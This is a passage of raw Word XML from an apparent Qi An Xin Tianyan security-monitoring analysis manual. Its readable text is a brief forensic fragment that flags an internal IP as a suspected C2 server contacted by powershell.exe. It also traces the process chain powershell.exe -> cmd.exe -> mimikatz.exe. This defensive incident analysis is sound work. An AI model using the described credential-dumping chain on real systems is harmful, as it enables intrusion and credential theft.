          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe的I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>访问，可以看到powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和10.95.13.253端口578频繁通信。可以怀疑10.95.13.253是C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>至此我们还原的进程链是powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe（2744）-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.exe(</w:t>
      </w:r>
      <w:r>
        <w:t>14160</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="14395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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1439545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="270002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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2700020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="11734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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>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6" w:h="16838"/>
      <w:pgMar w:top="2098" w:right="1701" w:bottom="1191" w:left="1701" w:header="1361" w:footer="680"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0000000000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000016" w:usb3="00000000" w:csb0="0004000F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="等线 Light">
    <w:altName w:val="汉仪中等线KW"/>
    <w:panose1 w:val="00000000000000000000"/>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 w:name="Helvetica Neue">
    <w:panose1 w:val="02000503000000020004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E50002FF" w:usb1="500079DB" w:usb2="00000010" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E1002AFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="200101FF" w:csb1="20280000"/>
  </w:font>
  <w:font w:name="微软雅黑">
    <w:altName w:val="汉仪旗黑KW"/>
    <w:panose1 w:val="020B0503020204020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000016" w:usb3="00000000" w:csb0="0004001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旗黑KW">
    <w:panose1 w:val="00020600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00002BF" w:usb1="3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egoe UI">
    <w:altName w:val="苹方-简"/>
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000029" w:usb3="00000000" w:csb0="200001DF" w:csb1="20000000"/>
  </w:font>
  <w:font w:name="Arial Unicode MS">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="FFFFFFFF" w:usb1="E9FFFFFF" w:usb2="0000003F" w:usb3="00000000" w:csb0="603F01FF" w:csb1="FFFF0000"/>
  </w:font>
  <w:font w:name="Segoe Print">
    <w:altName w:val="苹方-简"/>
    <w:panose1 w:val="02000600000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000"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color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:szCs w:val="15"/>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410200" cy="0"/>
              <wp:effectExtent l="0" t="0" r="19050" b="1905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flipV="1">
                        <a:off x="0" y="0"/>
                        <a:ext cx="5410200" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="3175">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:round/>
                      </a:ln>
                    </wps:spPr>
                    <wps:bodyPr/>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:line id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:0pt;flip:y;margin-left:0pt;margin-top:-0.05pt;height:0pt;width:426pt;z-index:251663360;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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AUwUCn1AAAAAQBAAAPAAAAAAAAAAEAIAAAADgAAABkcnMvZG93bnJldi54bWxQSwECFAAU&#10;AAAACACHTuJAMCiXBd8BAACIAwAADgAAAAAAAAABACAAAAA5AQAAZHJzL2Uyb0RvYy54bWxQSwUG&#10;AAAAAAYABgBZAQAAigUAAAAA&#10;">
              <v:fill on="f" focussize="0,0"/>
              <v:stroke weight="0.25pt" color="#7F7F7F [1612]" joinstyle="round"/>
              <v:imagedata o:title=""/>
              <o:lock v:ext="edit" aspectratio="f"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t>© 奇安信集团</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t xml:space="preserve">第 </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE   \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t>20</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t>页，共</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:bCs/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:bCs/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> SECTIONPAGES   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:bCs/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:bCs/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t>32</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:bCs/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="80"/>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spacing w:after="120"/>
      <w:ind w:firstLine="300"/>
      <w:rPr>
        <w:rStyle w:val="21"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="21"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE  </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="10"/>
      <w:spacing w:after="120"/>
      <w:ind w:firstLine="300"/>
    </w:pPr>
  </w:p>
  <w:p>
    <w:pPr>
      <w:spacing w:after="120"/>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after="120"/>
      <w:ind w:firstLine="30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003296" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>天眼系统检查和安全监测分析手册</w:t>
    </w:r>
    <w:r>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="margin">
            <wp:align>left</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-127000</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1080135" cy="360045"/>
          <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
          <wp:wrapNone/>
          <wp:docPr id="62" name="图片 62" descr="C:\Users\linsuxia01\Downloads\蓝虎蓝字 横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linsuxia01\Downloads\蓝虎蓝字 横 (1).png"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1" cstate="print">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:srcRect l="3779" t="7816" r="2745" b="9850"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="1080000" cy="360000"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:spacing w:line="216" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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120"/>
      <w:ind w:firstLine="360"/>
    </w:pPr>
  </w:p>
  <w:p>
    <w:pPr>
      <w:spacing w:after="120"/>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54D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01EE354D"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="60"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="840" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts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pStyle w:val="69"/>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
    <w:nsid w:val="05357E8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05357E8B"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="62"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="70"/>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FC15EBE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1FC15EB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5B96A43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25B96A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EBB3C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EBB3C91"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:pStyle w:val="31"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1. "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="32"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="794" w:hanging="794"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="33"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="35"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4706" w:hanging="1021"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1134" w:hanging="1134"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        <w:b/>
        <w:bCs w:val="0"/>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5" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="39"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1247" w:hanging="1247"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="42"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="图 %1.%7 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="43"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="表 %1.%8 "/>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
    <w:nsid w:val="57301111"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5730111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DE4363E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5DE436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60AB4FFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60AB4FF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20D4B3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="620D4B3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656522D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="656522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D640F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FD640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303037A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="730303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BBE78F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BBE78F0"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:pStyle w:val="64"/>
      <w:lvlText w:val="附录%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"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65"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="624"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="66"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="67"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="1361" w:hanging="1361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"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399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num w:numId="1">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="chineseCountingThousand"/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="%1. "/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="907" w:hanging="907"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:isLgl/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="%1.%2 "/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:ind w:left="794" w:hanging="794"/>
        </w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:lvl>
    </w:lvlOverride>
    <w:lvlOverride w:ilvl="2">
      <w:lvl w:ilvl="2" w:tentative="1">
        <w:start w:val="1"/>
        <w:numFmt w:val="decimal"/>
        <w:isLgl/>
        <w:suff w:val="space"/>
        <w:lvlText w:val="%1.%2.%3 "/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
